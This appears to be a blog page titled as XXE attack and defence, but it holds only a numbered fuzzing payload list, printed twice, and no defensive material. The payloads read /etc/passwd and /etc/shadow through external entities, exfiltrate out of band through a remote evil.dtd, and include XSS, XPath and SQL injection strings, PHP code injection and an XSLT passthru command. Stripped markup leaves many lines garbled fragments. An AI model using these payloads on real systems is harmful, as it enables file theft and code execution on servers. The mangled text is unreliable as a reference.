XXE (XML external entity injection) attack and defense

Fuzzing

 1 "php://filter/convert.base64-encode/resource=/etc/passwd">

2 "1.0" encoding="ISO-8859-1"?>
3 "aaaaaa">]>
4 "aaaaaa">]>&foo;
5 "1.0" encoding="ISO-8859-1"?>"aaaaaa">]>
6 "1.0" encoding="ISO-8859-1"?>"aaaaaa">]>< root>&foo;
7 "1.0" encoding="ISO-8859-1"?>
8 "1.0" encoding="ISO-8859-1"?>"file:///etc/passwd" >]>&xxe;
9 "1.0" encoding="ISO-8859-1"?>"file:///etc/passwd" >]>
10 "1.0" encoding="ISO-8859-1"?>"file:///etc/issue" >]>&xxe;
11 "1.0" encoding="ISO-8859-1"?>"file:///etc/issue" >]>
12 "1.0" encoding="ISO-8859-1"?>"file:///etc/shadow" >]>&xxe;
13 "1.0" encoding="ISO-8859-1"?>"file:///etc/shadow" >]>
14 "1.0" encoding="ISO-8859-1"?>"file:///c:/boot.ini" >]>&xxe;
15 "1.0" encoding="ISO-8859-1"?>"file:///c:/boot.ini" >]>
16 "1.0" encoding="ISO-8859-1"?>"http://example.com:80" >]>&xxe;
17 "1.0" encoding="ISO-8859-1"?>"http://example:443" >]>
18 "1.0" encoding="ISO-8859-1"?>"file:////dev/random">]>&xxe;
19
20 ]]>
21 &foo;
22 %foo;
23 count(/child::node())
24 x' or name()='username'< span style="color: #800000;"> or 'x'='y
25 ','')); phpinfo(); exit ;/*
26 var n=0;while(true){n++;}]]>
27 ]]>alert('XSS');]]>
28 "1.0" encoding="ISO-8859-1"?>]]>alert('XSS');]]>
29 ]]>alert('XSS');]]>
30 "1.0" encoding="ISO-8859-1"?>' or 1=1 or '' =']]>
31 ' or 1=1 or "=']]>
32 "javas]]>">]]>
33 "
xss"><IMG SRC= "javascript:alert('XSS')" >
"#xss" DATAFLD="B" DATAFORMATAS="HTML">
34 "xsstest.xml" ID=I>< /SPAN>
35
36 "
xsstest.xml" ID=I>
37 namespace="xss" implementation ="http://ha.ckers.org/xss.htc">XSS
38 namespace="xss" implementation ="http://ha.ckers.org/xss.htc">
39 "1.0" xmlns:xsl="< span style="color: #800000;">http://www.w3.org/1999/XSL/Transform" xmlns:php ="http://php.net/xsl">"/">
40 "1.0" xmlns:xsl="< span style="color: #800000;">http://www.w3.org/1999/XSL/Transform" xmlns:php ="http://php.net/xsl">"/">select="document('/etc/passwd')"/>
41 "1.0" xmlns:xsl="< span style="color: #800000;">http://www.w3.org/1999/XSL/Transform" xmlns:php ="http://php.net/xsl">"/">select="php:function('passthru','ls -la')"/>
42 " file:///etc/passwd" >]>
43 " file:///etc/shadow" >]>
44 " file:///c:/boot.ini" >] >
45 " http://example.com/text.txt" >] >
46 " file:////dev/random">]>
47 int " "> %int;
48 " ">
49 "< span style="color: #800000;">file:///etc/issue">"http://example.com/evil.dtd">%dtd;%trick;]>
50 "< span style="color: #800000;">file:///c:/boot.ini">"http://example.com/evil.dtd">%dtd;%trick;]>
51 "http://xxxx:22/"< /span>> %dtd;]>]]>

 1 "php:// filter/convert.base64-encode/resource=/etc/passwd">

2 "1.0" encoding="ISO-8859-1"?>
3 "aaaaaa">]>
4 "aaaaaa">]>&foo;
5 "1.0" encoding="ISO-8859-1"?>"aaaaaa">]>
6 "1.0" encoding="ISO-8859-1"?>"aaaaaa">]>< root>&foo;
7 "1.0" encoding="ISO-8859-1"?>
8 "1.0" encoding="ISO-8859-1"?>"file:///etc/passwd" >]>&xxe;
9 "1.0" encoding="ISO-8859-1"?>"file:///etc/passwd" >]>
10 "1.0" encoding="ISO-8859-1"?>"file:///etc/issue" >]>&xxe;
11 "1.0" encoding="ISO-8859-1"?>"file:///etc/issue" >]>
12 "1.0" encoding="ISO-8859-1"?>"file:///etc/shadow" >]>&xxe;
13 "1.0" encoding="ISO-8859-1"?>"file:///etc/shadow" >]>
14 "1.0" encoding="ISO-8859-1"?>"file:///c:/boot.ini" >]>&xxe;
15 "1.0" encoding="ISO-8859-1"?>"file:///c:/boot.ini" >]>
16 "1.0" encoding="ISO-8859-1"?>"http://example.com:80" >]>&xxe;
17 "1.0" encoding="ISO-8859-1"?>"http://example:443" >]>
18 "1.0" encoding="ISO-8859-1"?>"file:////dev/random">]>&xxe;
19
20 ]]>
21 &foo;
22 %foo;
23 count(/child::node())
24 x' or name()='username'< span style="color: #800000;"> or 'x'='y
25 ','')); phpinfo(); exit ;/*
26 var n=0;while(true){n++;}]]>
27 ]]>alert('XSS');]]>
28 "1.0" encoding="ISO-8859-1"?>]]>alert('XSS');]]>
29 ]]>alert('XSS');]]>
30 "1.0" encoding="ISO-8859-1"?>' or 1=1 or '' =']]>
31 ' or 1=1 or "=']]>
32 "javas]]>">]]>
33 "
xss"><IMG SRC= "javascript:alert('XSS')" >
"#xss" DATAFLD="B" DATAFORMATAS="HTML">
34 "xsstest.xml" ID=I>< /SPAN>
35
36 "
xsstest.xml" ID=I>
37 namespace="xss" implementation="http://ha.ckers.org/xss.htc">XSS
38 namespace="xss" implementation="http://ha.ckers.org/xss.htc">
39 "1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">"/">
40 "1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">"/">select="document(‘/etc/passwd‘)"/>
41 "1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">"/">select="php:function(‘passthru‘,‘ls -la‘)"/>
42 "file:///etc/passwd" >]>
43 "file:///etc/shadow" >]>
44 "file:///c:/boot.ini" >]>
45 "http://example.com/text.txt" >]>
46 "file:////dev/random">]>
47 int " "> %int;
48 "">
49 "file:///etc/issue">"http://example.com/evil.dtd">%dtd;%trick;]>
50 "file:///c:/boot.ini">"http://example.com/evil.dtd">%dtd;%trick;]>
51 "http://x.x.x.x:22/"> %dtd;]>]]>

WordPress database error: [Table 'yf99682.wp_s6mz6tyggq_comments' doesn't exist]
SELECT SQL_CALC_FOUND_ROWS wp_s6mz6tyggq_comments.comment_ID FROM wp_s6mz6tyggq_comments WHERE ( comment_approved = '1' ) AND comment_post_ID = 6029 ORDER BY wp_s6mz6tyggq_comments.comment_date_gmt ASC, wp_s6mz6tyggq_comments.comment_ID ASC

Leave a Comment

Your email address will not be published.